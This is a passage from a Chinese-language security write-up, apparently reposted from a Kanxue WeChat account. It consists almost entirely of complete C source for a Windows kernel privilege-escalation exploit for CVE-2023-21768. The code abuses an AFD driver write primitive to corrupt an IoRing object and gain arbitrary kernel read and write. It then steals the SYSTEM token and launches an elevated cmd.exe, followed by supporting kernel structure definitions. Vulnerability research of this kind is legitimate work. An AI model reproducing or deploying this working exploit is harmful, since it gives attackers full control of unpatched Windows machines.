unsigned int FakeRegBuffersCount = 1;
DWORD64 SystemEPROCaddr = 0;
DWORD64 MyEPROCaddr = 0;
DWORD64 SystemTokenaddr = 0;
DWORD64 MyTokenaddr = 0;
DWORD64 test = 0;
}
using namespace CVE_2023_21768;
//漏洞点任意地址写0x1
BOOL ExploitWrite0x1(void* pTargetPtr)
{
IO_STATUS_BLOCK IoStatusBlock;
HANDLE hEvent = NULL;
HANDLE hSocket = NULL;
HANDLE hCompletion = INVALID_HANDLE_VALUE;
OBJECT_ATTRIBUTES ObjectAttributes;
UNICODE_STRING ObjectFilePath;
DWORD dwStatus = 0;
BYTE bExtendedAttributes[] =
{
0x00, 0x00, 0x00, 0x00, 0x00, 0x0F, 0x1E, 0x00, 0x41, 0x66, 0x64, 0x4F, 0x70, 0x65, 0x6E, 0x50,
0x61, 0x63, 0x6B, 0x65, 0x74, 0x58, 0x58, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x02, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x60, 0xEF, 0x3D, 0x47, 0xFE
};
AFD_NOTIFYSOCK_DATA Data = { 0 };
// create status event
hEvent = CreateEvent(NULL, 0, 0, NULL);
if (hEvent == NULL)
{
// error
return FALSE;
}
// set afd endpoint path
memset((void*)&ObjectFilePath, 0, sizeof(ObjectFilePath));
ObjectFilePath.Buffer = (PWSTR)L"\Device\Afd\Endpoint";
ObjectFilePath.Length = wcslen(ObjectFilePath.Buffer) * sizeof(wchar_t);
ObjectFilePath.MaximumLength = ObjectFilePath.Length;
// initialise object attributes
memset((void*)&ObjectAttributes, 0, sizeof(ObjectAttributes));
ObjectAttributes.Length = sizeof(ObjectAttributes);
ObjectAttributes.ObjectName = &ObjectFilePath;
ObjectAttributes.Attributes = 0x40;
// create socket handle
IoStatusBlock.Status = 0;
IoStatusBlock.Information = NULL;
dwStatus = _NtCreateFile(&hSocket, MAXIMUM_ALLOWED, &ObjectAttributes, &IoStatusBlock, NULL, 0, FILE_SHARE_READ | FILE_SHARE_WRITE, 1, 0, bExtendedAttributes, sizeof(bExtendedAttributes));
if (dwStatus != 0)
{
// error
CloseHandle(hEvent);
return FALSE;
}
_NtCreateIoCompletion(&hCompletion, MAXIMUM_ALLOWED, NULL, 1);
_NtSetIoCompletion(hCompletion, 0, &IoStatusBlock, 0, 1);
Data.HandleIoCompletion = hCompletion;
Data.pData1 = VirtualAlloc(NULL, 0x2000, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
Data.pData2 = VirtualAlloc(NULL, 0x2000, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
Data.dwCounter = 0x1;
Data.dwLen = 0x1;
Data.dwTimeout = 100000000;
Data.pPwnPtr = pTargetPtr;
/*
__kernel_entry NTSYSCALLAPI NTSTATUS NtDeviceIoControlFile(
[in] HANDLE FileHandle,
[in, optional] HANDLE Event,
[in, optional] PIO_APC_ROUTINE ApcRoutine,
[in, optional] PVOID ApcContext,
[out] PIO_STATUS_BLOCK IoStatusBlock,
[in] ULONG IoControlCode,
[in, optional] PVOID InputBuffer,
[in] ULONG InputBufferLength,
[out, optional] PVOID OutputBuffer,
[in] ULONG OutputBufferLength
);
*/
_NtDeviceIoControlFile(hSocket, hEvent, NULL, NULL, &IoStatusBlock, AFD_NOTIFYSOCK_IOCTL, &Data, 0x30, NULL, 0);
if (INVALID_HANDLE_VALUE != hCompletion)
{
CloseHandle(hCompletion);
}
if (INVALID_HANDLE_VALUE != hSocket)
{
CloseHandle(hSocket);
}
if (NULL != hEvent)
{
CloseHandle(hEvent);
}
if (NULL != Data.pData1)
{
VirtualFree(Data.pData1, 0, MEM_RELEASE);
}
if (NULL != Data.pData2)
{
VirtualFree(Data.pData2, 0, MEM_RELEASE);
}
return TRUE;
}
int getobjptr(PULONG64 ppObjAddr, ULONG ulPid, HANDLE handle)
{
int ret = -1;
PSYSTEM_HANDLE_INFORMATION pHandleInfo = NULL;
ULONG ulBytes = 0;
NTSTATUS ntStatus = STATUS_SUCCESS;
while ((ntStatus = _NtQuerySystemInformation(SystemHandleInformation, pHandleInfo, ulBytes, &ulBytes)) == STATUS_INFO_LENGTH_MISMATCH)
{
if (pHandleInfo != NULL)
{
pHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, pHandleInfo, 2 * ulBytes);
}
else
{
pHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 2 * ulBytes);
}
}
if (ntStatus != STATUS_SUCCESS)
{
ret = ntStatus;
goto done;
}
for (ULONG i = 0; i < pHandleInfo->NumberOfHandles; i++)
{
if ((pHandleInfo->Handles[i].UniqueProcessId == ulPid) && (pHandleInfo->Handles[i].HandleValue == (unsigned short)handle))
{
*ppObjAddr = (ULONG64)pHandleInfo->Handles[i].Object;
ret = 0;
break;
}
}
done:
if (NULL != pHandleInfo)
{
HeapFree(GetProcessHeap, 0, pHandleInfo);
}
return ret;
}
int ioring_init(PIORING_OBJECT* ppIoRingAddr)
{
int ret = -1;
IORING_CREATE_FLAGS ioRingFlags;
//创建IoRing
ioRingFlags.Required = IORING_CREATE_REQUIRED_FLAGS_NONE;
ioRingFlags.Advisory = IORING_CREATE_ADVISORY_FLAGS_NONE;
ret = CreateIoRing(IORING_VERSION_3, ioRingFlags, 0x10000, 0x20000, &hIoRing);
if (0 != ret)
{
printf("CreateIoRing failed");
return FALSE;
}
//获取内核层指向IORING_OBJECT的结构体指针
ret = getobjptr((PULONG64)ppIoRingAddr, GetCurrentProcessId(), *(PHANDLE)hIoRing);
if (0 != ret)
{
return FALSE;
}
pIoRing = *ppIoRingAddr;
return TRUE;
}
BOOL File_init()
{
hInPipe = CreateNamedPipeW(L"\\.\pipe\ioring_in", PIPE_ACCESS_DUPLEX, PIPE_WAIT, 255, 0x1000, 0x1000, 0, NULL);
hOutPipe = CreateNamedPipeW(L"\\.\pipe\ioring_out", PIPE_ACCESS_DUPLEX, PIPE_WAIT, 255, 0x1000, 0x1000, 0, NULL);
if ((INVALID_HANDLE_VALUE == hInPipe) || (INVALID_HANDLE_VALUE == hOutPipe))
{
printf("CreateNamedPipeW failed");
return FALSE;
}
hInPipeClient = CreateFileW(L"\\.\pipe\ioring_in", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
hOutPipeClient = CreateFileW(L"\\.\pipe\ioring_out", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if ((INVALID_HANDLE_VALUE == hInPipeClient) || (INVALID_HANDLE_VALUE == hOutPipeClient))
{
printf("CreateNamedPipeW failed");
return FALSE;
}
return TRUE;
}
BOOL FakeRegisterBuffers_init()
{
_HIORING* phIoRing = NULL;
//设置内核层的_IORING_OBJECT结构体
//IoRing->RegBuffers=0x1000000
if (!ExploitWrite0x1((char*)&pIoRing->RegBuffers + 0x3))
{
printf("IoRing->RegBuffers write failed");
return FALSE;
}
//IoRing->RegBuffersCount=0x1s
if (!ExploitWrite0x1((char*)&pIoRing->RegBuffersCount))
{
printf("IoRing->RegBuffersCount write failed");
return FALSE;
}
//在0x1000000申请对应Count数的空间,这应该是个结构体指针数组,每个指针都指向_IOP_MC_BUFFER_ENTRY结构体
pFakeRegBuffers = VirtualAlloc((LPVOID)FakeRegBufferAddr, sizeof(ULONG64) * FakeRegBuffersCount, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
memset(pFakeRegBuffers, 0, sizeof(ULONG64) * FakeRegBuffersCount);
//设置用户层的_HIORING结构体
phIoRing = *(_HIORING**)&hIoRing;
phIoRing->RegBufferArray = pFakeRegBuffers;
phIoRing->BufferArraySize = FakeRegBuffersCount;
return TRUE;
}
BOOL TokenAddr_init()
{
HANDLE hProc = NULL;
hProc = OpenProcess(PROCESS_QUERY_INFORMATION, 0, GetCurrentProcessId());
getobjptr(&SystemEPROCaddr, 4, (HANDLE)4);
getobjptr(&MyEPROCaddr, GetCurrentProcessId(), hProc);
SystemTokenaddr = SystemEPROCaddr+ EPROC_TOKEN_OFFSET;
MyTokenaddr = MyEPROCaddr+ EPROC_TOKEN_OFFSET;
printf("SystemTokenaddr : %llxn", SystemTokenaddr);
printf("MyTokenaddr : %llxn", MyTokenaddr);
return TRUE;
}
BOOL Init_CVE_2023_21768()
{
_NtCreateFile = (unsigned long(__stdcall*)(PHANDLE, unsigned long, POBJECT_ATTRIBUTES, PIO_STATUS_BLOCK, PLARGE_INTEGER, unsigned long, unsigned long, unsigned long, unsigned long, void*, unsigned long))GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtCreateFile");
_NtDeviceIoControlFile = (unsigned long(__stdcall*)(HANDLE, void*, void*, void*, PIO_STATUS_BLOCK, unsigned long, void*, unsigned long, void*, unsigned long))GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtDeviceIoControlFile");
_NtCreateIoCompletion = (unsigned long(__stdcall*)(PHANDLE, unsigned long, POBJECT_ATTRIBUTES, unsigned long))GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtCreateIoCompletion");
_NtSetIoCompletion = (unsigned long(__stdcall*)(HANDLE, unsigned long, PIO_STATUS_BLOCK, NTSTATUS, unsigned long))GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtSetIoCompletion");
_NtQuerySystemInformation = (unsigned long(__stdcall*)(SYSTEM_INFORMATION_CLASS, PVOID, ULONG, PULONG))GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQuerySystemInformation");
if (_NtSetIoCompletion == NULL|| _NtDeviceIoControlFile == NULL|| _NtCreateFile == NULL|| _NtCreateIoCompletion == NULL)
{
printf("get function false ");
return FALSE;
}
ioring_init(&pIoRing);
File_init();
FakeRegisterBuffers_init();
TokenAddr_init();
}
int ioring_read(PULONG64 pRegisterBuffers, ULONG64 pReadAddr, PVOID pReadBuffer, ULONG ulReadLen)
{
int ret = -1;
PIOP_MC_BUFFER_ENTRY pMcBufferEntry = NULL;
IORING_HANDLE_REF reqFile = IoRingHandleRefFromHandle(hOutPipeClient);
IORING_BUFFER_REF reqBuffer = IoRingBufferRefFromIndexAndOffset(0, 0);
IORING_CQE cqe = { 0 };
pMcBufferEntry = (PIOP_MC_BUFFER_ENTRY)VirtualAlloc(NULL, sizeof(IOP_MC_BUFFER_ENTRY), MEM_COMMIT, PAGE_READWRITE);
if (NULL == pMcBufferEntry)
{
ret = GetLastError();
goto done;
}
pMcBufferEntry->Address = (PVOID)pReadAddr;
pMcBufferEntry->Length = ulReadLen;
pMcBufferEntry->Type = 0xc02;
pMcBufferEntry->Size = 0x80;
pMcBufferEntry->AccessMode = 1;
pMcBufferEntry->ReferenceCount = 1;
pRegisterBuffers[0] = (ULONG64)pMcBufferEntry;
ret = BuildIoRingWriteFile(hIoRing, reqFile, reqBuffer, ulReadLen, 0, FILE_WRITE_FLAGS_NONE, NULL, IOSQE_FLAGS_NONE);
if (0 != ret)
{
goto done;
}
ret = SubmitIoRing(hIoRing, 0, 0, NULL);
if (0 != ret)
{
goto done;
}
ret = PopIoRingCompletion(hIoRing, &cqe);
if (0 != ret)
{
goto done;
}
if (0 != cqe.ResultCode)
{
ret = cqe.ResultCode;
goto done;
}
if (0 == ReadFile(hOutPipe, pReadBuffer, ulReadLen, NULL, NULL))
{
ret = GetLastError();
goto done;
}
ret = 0;
done:
if (NULL != pMcBufferEntry)
{
VirtualFree(pMcBufferEntry, sizeof(IOP_MC_BUFFER_ENTRY), MEM_RELEASE);
}
return ret;
}
int ioring_write(PULONG64 pRegisterBuffers, ULONG64 pWriteAddr, PVOID pWriteBuffer, ULONG ulWriteLen)
{
int ret = -1;
PIOP_MC_BUFFER_ENTRY pMcBufferEntry = NULL;
IORING_HANDLE_REF reqFile = IoRingHandleRefFromHandle(hInPipeClient);
IORING_BUFFER_REF reqBuffer = IoRingBufferRefFromIndexAndOffset(0, 0);
IORING_CQE cqe = { 0 };
if (0 == WriteFile(hInPipe, pWriteBuffer, ulWriteLen, NULL, NULL))
{
ret = GetLastError();
goto done;
}
pMcBufferEntry = (PIOP_MC_BUFFER_ENTRY)VirtualAlloc(NULL, sizeof(IOP_MC_BUFFER_ENTRY), MEM_COMMIT, PAGE_READWRITE);
if (NULL == pMcBufferEntry)
{
ret = GetLastError();
goto done;
}
pMcBufferEntry->Address = (PVOID)pWriteAddr;
pMcBufferEntry->Length = ulWriteLen;
pMcBufferEntry->Type = 0xc02;
pMcBufferEntry->Size = 0x80;
pMcBufferEntry->AccessMode = 1;
pMcBufferEntry->ReferenceCount = 1;
pRegisterBuffers[0] = (ULONG64)pMcBufferEntry;
ret = BuildIoRingReadFile(hIoRing, reqFile, reqBuffer, ulWriteLen, 0, NULL, IOSQE_FLAGS_NONE);
if (0 != ret)
{
goto done;
}
ret = SubmitIoRing(hIoRing, 0, 0, NULL);
if (0 != ret)
{
goto done;
}
ret = PopIoRingCompletion(hIoRing, &cqe);
if (0 != ret)
{
goto done;
}
if (0 != cqe.ResultCode)
{
ret = cqe.ResultCode;
goto done;
}
ret = 0;
done:
if (NULL != pMcBufferEntry)
{
VirtualFree(pMcBufferEntry, sizeof(IOP_MC_BUFFER_ENTRY), MEM_RELEASE);
}
return ret;
}
VOID PrivilegeEscalatio()
{
ULONG64 ullSysToken;
//ioring_write((PULONG64)pFakeRegBuffers, (ULONG64)&test, &ullSysToken, sizeof(ULONG64));
//printf("%llxn", &test);
ioring_read((PULONG64)pFakeRegBuffers, SystemTokenaddr, &ullSysToken, sizeof(ULONG64));
printf("ullSysToken : %llxn", ullSysToken);
ioring_write((PULONG64)pFakeRegBuffers, MyTokenaddr, &ullSysToken, sizeof(ULONG64));
}
VOID CreateCmd()
{
STARTUPINFO si = { sizeof(si) };
PROCESS_INFORMATION pi = { 0 };
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOW;
WCHAR wzFilePath[MAX_PATH] = { L"cmd.exe" };
BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, (LPSTARTUPINFOW)&si, &pi);
if (bReturn) CloseHandle(pi.hThread), CloseHandle(pi.hProcess);
}
VOID FixData()
{
char null[0x10] = { 0 };
ioring_write((PULONG64)pFakeRegBuffers, (ULONG64)(&pIoRing->RegBuffersCount), &null, 0x10);
if (pFakeRegBuffers != NULL)
{
VirtualFree(pFakeRegBuffers, sizeof(ULONG64) * FakeRegBuffersCount, MEM_RELEASE);
}
if (hIoRing != NULL)
{
CloseHandle(hIoRing);
}
}
int main()
{
Init_CVE_2023_21768();
PrivilegeEscalatio();
CreateCmd();
FixData();
}
#include "win_defs.h"
typedef struct AFD_NOTIFYSOCK_DATA
{
HANDLE HandleIoCompletion;
PVOID pData1;
PVOID pData2;
PVOID pPwnPtr;
DWORD dwCounter;
DWORD dwTimeout;
DWORD dwLen;
char lol[0x4];
}AFD_NOTIFYSOCK_DATA;
typedef struct _NT_IORING_CREATE_FLAGS
{
enum _NT_IORING_CREATE_REQUIRED_FLAGS Required;
enum _NT_IORING_CREATE_ADVISORY_FLAGS Advisory;
} NT_IORING_CREATE_FLAGS, * PNT_IORING_CREATE_FLAGS;
typedef struct _NT_IORING_INFO
{
enum IORING_VERSION IoRingVersion;
struct _NT_IORING_CREATE_FLAGS Flags;
unsigned int SubmissionQueueSize;
unsigned int SubmissionQueueRingMask;
unsigned int CompletionQueueSize;
unsigned int CompletionQueueRingMask;
struct _NT_IORING_SUBMISSION_QUEUE* SubmissionQueue;
struct _NT_IORING_COMPLETION_QUEUE* CompletionQueue;
} NT_IORING_INFO, * PNT_IORING_INFO;
typedef struct _IOP_MC_BUFFER_ENTRY
{
USHORT Type;
USHORT Reserved;
ULONG Size;
ULONG ReferenceCount;
ULONG Flags;
LIST_ENTRY GlobalDataLink;
PVOID Address;
ULONG Length;
CHAR AccessMode;
ULONG MdlRef;
struct _MDL* Mdl;
KEVENT MdlRundownEvent;
PULONG64 PfnArray;
BYTE PageNodes[0x20];
} IOP_MC_BUFFER_ENTRY, * PIOP_MC_BUFFER_ENTRY;
typedef struct _IORING_OBJECT
{
short Type;
short Size;
struct _NT_IORING_INFO UserInfo;
void* Section;
struct _NT_IORING_SUBMISSION_QUEUE* SubmissionQueue;
struct _MDL* CompletionQueueMdl;
struct _NT_IORING_COMPLETION_QUEUE* CompletionQueue;
unsigned __int64 ViewSize;
long InSubmit;
unsigned __int64 CompletionLock;
unsigned __int64 SubmitCount;
unsigned __int64 CompletionCount;
unsigned __int64 CompletionWaitUntil;
struct _KEVENT CompletionEvent;
unsigned char SignalCompletionEvent;
struct _KEVENT* CompletionUserEvent;
unsigned int RegBuffersCount;
struct _IOP_MC_BUFFER_ENTRY** RegBuffers;
unsigned int RegFilesCount;
void** RegFiles;
} IORING_OBJECT, * PIORING_OBJECT;
typedef struct _HIORING
{
HANDLE handle;
NT_IORING_INFO Info;
ULONG IoRingKernelAcceptedVersion;
PVOID RegBufferArray;
ULONG BufferArraySize;
PVOID Unknown;
ULONG FileHandlesCount;
ULONG SubQueueHead;
ULONG SubQueueTail;
}_HIORING;
#ifndef _WIN_DEFS_H_
#define _WIN_DEFS_H_
#define EPROC_TOKEN_OFFSET 0x4b8
#define SystemHandleInformation (SYSTEM_INFORMATION_CLASS)16
typedef struct _OBJECT_TYPE_INFORMATION
{
UNICODE_STRING TypeName;
ULONG TotalNumberOfObjects;
ULONG TotalNumberOfHandles;
ULONG TotalPagedPoolUsage;
ULONG TotalNonPagedPoolUsage;
ULONG TotalNamePoolUsage;
ULONG TotalHandleTableUsage;
ULONG HighWaterNumberOfObjects;
ULONG HighWaterNumberOfHandles;
ULONG HighWaterPagedPoolUsage;
ULONG HighWaterNonPagedPoolUsage;
ULONG HighWaterNamePoolUsage;
ULONG HighWaterHandleTableUsage;
ULONG InvalidAttributes;
GENERIC_MAPPING GenericMapping;
ULONG ValidAccessMask;
BOOLEAN SecurityRequired;
BOOLEAN MaintainHandleCount;
BOOLEAN TypeIndex;
CHAR ReservedByte;
ULONG PoolType;
ULONG DefaultPagedPoolCharge;
ULONG DefaultNonPagedPoolCharge;
} OBJECT_TYPE_INFORMATION, * POBJECT_TYPE_INFORMATION;
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
{
unsigned short UniqueProcessId;
unsigned short CreatorBackTraceIndex;
unsigned char ObjectTypeIndex;
unsigned char HandleAttributes;
unsigned short HandleValue;
void* Object;
unsigned long GrantedAccess;
long __PADDING__[1];
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO;
typedef struct _SYSTEM_HANDLE_INFORMATION
{
unsigned long NumberOfHandles;
struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;
typedef struct _DISPATCHER_HEADER
{
union
{
volatile long Lock;
long LockNV;
struct
{
unsigned char Type;
unsigned char Signalling;
unsigned char Size;
unsigned char Reserved1;
};
struct
{
unsigned char TimerType;
union
{
unsigned char TimerControlFlags;
struct
{
struct
{
unsigned char Absolute : 1;
unsigned char Wake : 1;
unsigned char EncodedTolerableDelay : 6;
};
unsigned char Hand;
union
{
unsigned char TimerMiscFlags;
struct
{
unsigned char Index : 6;
unsigned char Inserted : 1;
volatile unsigned char Expired : 1;
};
};
};
};
};
struct
{
unsigned char Timer2Type;
union
{
unsigned char Timer2Flags;
struct
{
struct
{
unsigned char Timer2Inserted : 1;
unsigned char Timer2Expiring : 1;
unsigned char Timer2CancelPending : 1;
unsigned char Timer2SetPending : 1;
unsigned char Timer2Running : 1;
unsigned char Timer2Disabled : 1;
unsigned char Timer2ReservedFlags : 2;
};
unsigned char Timer2ComponentId;
unsigned char Timer2RelativeId;
};
};
};
struct
{
unsigned char QueueType;
union
{
unsigned char QueueControlFlags;
struct
{
struct
{
unsigned char Abandoned : 1;
unsigned char DisableIncrement : 1;
unsigned char QueueReservedControlFlags : 6;
};
unsigned char QueueSize;
unsigned char QueueReserved;
};
};
};
struct
{
unsigned char ThreadType;
unsigned char ThreadReserved;
union
{
unsigned char ThreadControlFlags;
struct
{
struct
{
unsigned char CycleProfiling : 1;
unsigned char CounterProfiling : 1;
unsigned char GroupScheduling : 1;
unsigned char AffinitySet : 1;
unsigned char Tagged : 1;
unsigned char EnergyProfiling : 1;
unsigned char SchedulerAssist : 1;
unsigned char ThreadReservedControlFlags : 1;
};
union
{
unsigned char DebugActive;
struct
{
unsigned char ActiveDR7 : 1;
unsigned char Instrumented : 1;
unsigned char Minimal : 1;
unsigned char Reserved4 : 2;
unsigned char AltSyscall : 1;
unsigned char Emulation : 1;
unsigned char Reserved5 : 1;
};
};
};
};
};
struct
{
unsigned char MutantType;
unsigned char MutantSize;
unsigned char DpcActive;
unsigned char MutantReserved;
};
};
long SignalState;
LIST_ENTRY WaitListHead;
} DISPATCHER_HEADER, * PDISPATCHER_HEADER;
typedef struct _KEVENT
{
struct _DISPATCHER_HEADER Header;
} KEVENT, * PKEVENT;
#endif
提权结果
参考
看雪ID:The_Itach1
https://bbs.kanxue.com/user-home-926755.htm
# 往期推荐
3、安卓加固脱壳分享
球分享
球点赞
球在看
原文始发于微信公众号(看雪学苑):CVE-2023-21768 Windows内核提权漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论